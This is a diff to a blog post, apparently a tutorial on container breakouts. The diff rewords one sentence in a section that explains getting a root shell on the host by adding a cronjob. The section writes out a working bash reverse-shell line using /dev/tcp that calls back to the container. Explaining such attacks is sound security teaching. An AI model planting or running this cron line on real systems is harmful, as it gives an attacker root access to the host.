NodyHub/blog/content/posts/container-breakouts-part1.md

 ### Cronjob

-Due to the fact that in a default setup the container is **direct connected to the host**, we can initiate not only connections from the container to the host, also vice-versa.
+Because in a default setup the container is **direct connected to the host**, we can initiate not only connections from the container to the host, also vice-versa.
 To do so, we need the IP address from the container.
 Depending on the binaries that are available on the host, we initiate a **reverse shell by** a **cronjob** that connects to an exposed port on the container.
 In this showcase, we use `bash` for the reverse connection and `netcat` to handle the connection in the container.
 The following line is all we need:

 ```
 * * * * * root bash -i >& /dev/tcp/$CONTAINER_IP/$CONTAINER_PORT 0>&1